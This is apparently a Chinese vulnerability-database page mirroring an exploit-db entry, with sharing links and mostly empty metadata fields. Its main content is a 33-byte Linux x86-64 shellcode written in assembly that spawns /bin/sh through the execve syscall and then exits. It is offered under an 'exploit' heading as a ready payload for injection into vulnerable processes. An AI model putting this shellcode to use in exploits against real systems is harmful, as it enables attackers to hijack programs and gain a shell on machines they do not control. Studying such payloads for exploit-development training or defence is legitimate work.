Linux/x64 - execve(/bin/sh) Shellcode (33 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056031 漏洞类型
发布时间 2006-11-02 更新时间 2006-11-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86-64 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13464
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# [Linux/X86-64]
# Dummy for shellcode:
# execve("/bin/sh", ["/bin/sh"], NULL)
# hophet [at] gmail.com

.text
	.globl _start
_start:
	
	xorq	%rdx, %rdx
	movq	$0x68732f6e69622fff,%rbx
	shr	$0x8, %rbx
	push	%rbx
	movq	%rsp,%rdi
	xorq	%rax,%rax
	pushq	%rax
	pushq	%rdi
	movq	%rsp,%rsi
	mov	$0x3b,%al	# execve(3b)
	syscall

	pushq	$0x1
	pop	%rdi
	pushq	$0x3c		# exit(3c)
	pop	%rax
	syscall


# milw0rm.com [2006-11-02]